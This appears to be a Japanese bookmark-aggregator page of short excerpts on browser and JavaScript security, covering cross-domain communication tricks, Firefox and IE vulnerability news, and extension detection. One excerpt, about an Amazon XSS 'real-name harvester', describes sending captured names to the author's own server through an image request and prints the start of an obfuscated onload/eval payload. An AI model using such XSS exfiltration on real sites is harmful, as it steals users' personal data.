猛暑を乗り切った服・小物・その他 とにかく2025年の夏は暑かった。 と、毎年言っている気がするけど、今年は特別暑かったのではないか。これが地球温暖化なのだと見せつけられているような気がする。スノーボーダーとしてはそれに全力で抗う必要があるんだけど、自分の態度がまだ追いついていない。 生…
はてなブログ | 無料ブログを作成しよう
猛暑を乗り切った服・小物・その他 とにかく2025年の夏は暑かった。 と、毎年言っている気がするけど、今年は特別暑かったのではないか。これが地球温暖化なのだと見せつけられているような気がする。スノーボーダーとしてはそれに全力で抗う必要があるんだけど、自分の態度がまだ追いついていない。 生…
IFrameとFragment Identifier使ったクロスドメイン通信について - snippets from shinichitomita’s journal
なぜかちょっと盛り上がり気味な記事 XhrIframeProxy(dojo) ○? ○ △? 中? マウスクリック音有り iframe内iframe ○? ○ △? 中? マウスクリック音有り http://d.hatena.ne.jp/nopnop/20080408/1207669947 この2つはFragment Identifierと多重IFrameを利用しているという点では同じなのかなあ。 正直、これらは何を内部でおこなっているか分かりにくいと思う。JSONPのような簡潔さはない。 説明を試みてみる。理解するためにまず押さえておくことがいくつかある。 まずひとつ目に、フレーム(ウィンドウ)に含まれるドキュメントを示す location の値はそのフレーム外部から書き換えることができる。こんなかんじ。 <iframe id="ifr" src="http://www.example.
サーバーサイド技術を使わないクロスドメイン通信補足 - os0x.blog
クロスドメイン通信方法のまとめ - nopnopの日記の補足です。 ブックマークコメントでちょろっと書いたけど、nopnopさんが書いている以外の方法としてwindowのname属性を使う方法とHTML5のpostMessageがあります。 window.name これは単純な方法(その分、クロスブラウザであり割と古いブラウザでも動作する(追記:)と、思ったけどIEの動作は微妙かもしれない)で、例えばwindow.open('http://example.com/','hogehoge');といったJavaScriptでウィンドウ(タブ)を開くと、hogehogeというウィンドウが開かれます。インラインフレームなどにも同様にwindowにnameをつけることができます。この名前はwindowを作る側が設定することが出来て、作られる側はドメインなどに関係なく設定されたnameを読み取ることが
ITmedia エンタープライズ:MozillaがFirefox用のJavaScript Fuzzerをリリース
Mozillaは、Black Hatカンファレンスの場でFirefox用のJavaScript Fuzzerをリリースする。 オープンソース財団のMozillaでは、Firefoxブラウザの開発を通じて培った知識を、一連のオープンソースツールの形で提供する方針だ。その第1弾となるJavaScript Fuzzerは、ラスベガスで開催されるイベント「Black Hat」カンファレンスで8月2日にリリースされる。 Mozillaのセキュリティ責任者を務めるウィンドウ・シュナイダー氏が米eWEEKに明らかにしたところによると、同氏はMozillaにおけるセキュリティの取り組みを詳細に説明する予定だという。「こういった詳細な説明を既存ベンダーから聞くことはできない」とシュナイダー氏は話す。「Mozillaは全世界から注視されている。われわれは隠したいと思っても隠すことができないのだ」。 シュナイダ
ブラウザはどんどん使いづらくなる
「ブラウザが使いづらくなる」などというと,「何のこっちゃ」と思うかもしれない。ブラウザはバージョンアップを繰り返し,機能は次第に充実している。むしろ,使い勝手は向上しているのではないか。そう考えるのが普通かもしれない。また,GoogleマップやGoogle Docs&Spreadsheetsに代表されるように,いわゆるAjaxを駆使することでブラウザだけで操作性のいいアプリケーションを実現できるようになった。さらにパソコンだけでなく,携帯電話/スマートフォンにもフルブラウザが搭載され,ブラウザの利用シーンは格段に広がっている。 筆者も,この点には全く異論はないし,どこにいてもブラウザさえあれば様々なアプリケーションを利用できる環境は確かに便利だとも思う。ではなぜ使いづらくなると言っているのか。問題は,ブラウザを狙った攻撃が目立ち始め,エンドユーザーが従来以上にブラウザのセキュリティを意識し
高木浩光@自宅の日記 - 「常に新しい」新銀行東京は時代に取り残されていた
文字潰れを起こしていて読めない。 「フィッシング とは」の図解ページなんかは、図に書かれた文章からして文字が米粒大に なっている。 パッと見で勝負。中身は読んでもらう必要なし。 という方針で作られているのだろう。 ■ 「常に新しい」新銀行東京は時代に取り残されていた 「都民になったことだし、新銀行東京*1 に口座でも作るか」 とサイトを訪れてみたところ、なんと、インターネット バンキングのログイン画面は、 アドレスバーを隠したポップアップウィンドウになっていた。 古いシステムを今から作り直すお金がないというのならわかるが、今年新たに 開業した銀行がのっけからフィッシング詐欺の基礎対策をしないというのは、 わけがわからない。いったいどこの業者が作ったのだろうか。 しかも「右クリックは禁止です」と得意げだ。
FirefoxのJavaScript実装に脆弱性--迅速な対応が困難な場合も
サンディエゴ発--オープンソースブラウザ「Firefox」について、2人のハッカーが米国時間9月30日午後、JavaScriptの扱いに関する重大な脆弱性があると指摘した。 Mischa Spiegelmock氏とAndrew Wbeelsoi氏は当地で開催されたToorConハッカーカンファレンスで、悪意あるJavaScriptを含むウェブページを作成するだけで、ブラウザを実行しているコンピュータを乗っ取ることができると説明した。この脆弱性は、Windows、Apple ComputerのMac OS X、Linux上のFirefoxに影響するという。 普段はブログ企業SixApartで勤務しているSpiegelmock氏は「Internet Explorerは、誰でも知っているように、あまりセキュアではない。しかしFirefoxも、かなり危険なのだ」と述べ、脆弱性の悪用に必要な攻撃コー
秋元@サイボウズ研究所プログラマーBlog 訪問者が入れているFirefox extensionを検知するJavascript
chrome:プロトコルで Firefox Extension が持っている画像などをアクセスすることで、その Firefox である extension がインストールされているかどうかを判定できるらしい。 実際のデモはこちら(自分の使ってる拡張機能を知られたくない人は押さないこと) 著名な extension ごとのチェック対象画像のリストを整理している人もいた。 リンクが訪問済かどうかをCSSの属性からチェックする技法がちょっと前に話題になったけど、いろいろ考えるもんだ。 # こちらは、 あなたのWeb2.0度判定テストやHatebu::Addiction(はてブ中毒度)などで使われている。 この記事は移転前の古いURLで公開された時のものですブックマークが新旧で分散している場合があります。移転前は現在とは文体が違い「である」調です。(参考)記事の内容が古くて役に立たなくなっている、
プライバシーと安全性 その2 | Torisugariの日記 | スラド
Japanizeの新バージョンがリリースされているので、今度は安全性について、つまり、旧版のセキュリティ上の問題点にスポットライトを当ててみたいと思います。 と、その前に、私は前回の日記のコメントに と書きましたが、この新バージョンでは、私が前回の日記で指摘したプライバシー上の問題点が早くも克服されています。これは、いろいろな意味で、非常に喜ばしいことだと思いますし、この点について高く評価すべきだと思います。 では、本題です。まず、Japanizeで使われている翻訳データがJavaScriptである、というところがポイントです。といっても、どういうものかピンと来ないと思うので、実際のデータを見て下さい。 例えば、www.google.comの場合だと、該当データは http://japanize.31tools.com/data/www.google.com/current.txt です。
sta la sta - たった1行のJavaScriptコードでInternet Explorerをクラッシュさせる方法
注意! IEを使用中の方は、リンク先の記事内にクラッシュコードのあるサンプルページへのリンクがあるので、クリックしないようにくれぐれもお気をつけ下さい! 「you can find the code here」の「here」にあります。クラッシュをテストしたい方は別ですが。 http://www.modernlifeisrubbish.co.uk/how-to-crash-internet-explorer.asp 普段、ネットサーフィンでIEを使用している方にとっては、あまり嬉しくない話だろう。 こちらの記事の方がIEとFireFoxの両方で動作するJavaScriptコードを書く仕事をしている最中に、偶然にも、IEをクラッシュさせるコードを見つけてしまったそうな。 そのコードは複雑怪奇なものではなく、以下のようなたった1行のコードのようだ。 記事内に、上記コードを仕組んだサンプルページ
Latest topics > 署名されていないスクリプトで各種の特権を取得する方法 - outsider reflex
Latest topics > 署名されていないスクリプトで各種の特権を取得する方法 宣伝。日経LinuxにてLinuxの基礎?を紹介する漫画「シス管系女子」を連載させていただいています。 以下の特設サイトにて、単行本まんがでわかるLinux シス管系女子の試し読みが可能! « UbuntuとOpenOffice.org Main Mozillaコミュニティが初心者に厳しい理由を考えてみた » 署名されていないスクリプトで各種の特権を取得する方法 - Jun 27, 2006 JavaScriptで危険な事や妙ちきりんな事をしてみたい人のための覚え書き。一般的なユーザの立場の人はあんまり見ない方がいい話。興味本位で触ると痛い目を見かねない話。 JavaScriptで親ウィンドウや最後のウィンドウを閉じようとしたり、他のドメインへの通信、XPConnectなどなど危険な操作をしようとすると、
IEにもFirefoxにもJavaScript処理の脆弱性--次期リリースで修復へ
MicrosoftとMozillaが、両社のウェブブラウザに存在するセキュリティホールが侵入者によって悪用され、ファイルを盗まれるおそれがあることを認めた。だが、こうした悪用は条件的に難しく、リスクはそれほど大きくないとも話している。 セキュリティ専門家は今週に入って、「Internet Explorer(IE)」および「Firefox」、そしてMozillaのその他のブラウザでJavaScriptを処理する方法に脆弱性があると警告していた。攻撃者がこうした問題を悪用して、ファイルを不正にアップロードする可能性があり、マシンユーザーの個人情報が危険にさらされるというのである。 しかし、ユーザー側が多くの操作を行わなければ同脆弱性の悪用は難しいことから、MicrosoftおよびMozillaは差し迫った危険はなく、修正パッチをすぐにリリースする必要もないと考えている。関係者によれば、両社はブ
本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!
↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 本名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Taken SPC : Sage に未パッチの RSS 脆弱性